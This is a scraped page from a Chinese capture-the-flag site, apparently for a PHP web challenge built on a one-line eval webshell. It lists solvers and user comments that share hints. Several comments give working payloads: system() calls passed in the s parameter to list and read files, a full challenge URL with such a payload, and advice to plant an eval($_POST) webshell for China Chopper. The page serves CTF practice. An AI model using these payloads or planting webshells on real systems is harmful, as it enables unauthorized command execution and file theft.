评分(10)
解题动态
warm007 攻破了该题 3小时前
R1 攻破了该题 7小时前
a591961189 攻破了该题 9小时前
阿杰学网安 攻破了该题 10小时前
yxm8085 攻破了该题 12小时前
xtelnet 攻破了该题 16小时前
dcd 攻破了该题 17小时前
bbbuild 攻破了该题 1天前
yy147369 攻破了该题 1天前
yiyiyiyi1 攻破了该题 1天前
搁浅的小鱼 攻破了该题 1天前
aaggyy1 攻破了该题 1天前
18737958336 攻破了该题 1天前
yehlg 攻破了该题 1天前
zzasas 攻破了该题 1天前
mybugku26 攻破了该题 1天前
sfwy 攻破了该题 1天前
天青色等烟雨 攻破了该题 1天前
沐恩 攻破了该题 1天前
评论
a2cai 4年前
举报
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
ximing 4年前
举报
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
shan 4年前
举报
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
yinyue 4年前
举报
不多说了,套娃了解下
eleven 4年前
举报
?s=system("cat *.txt")
naihe567 4年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
mantou 4年前
举报
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)
Y1rannn 5年前
举报
...没那么复杂啊,我直接s=system("")
pest 5年前
举报
除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。
simpleboy 5年前
举报
解法还是很多的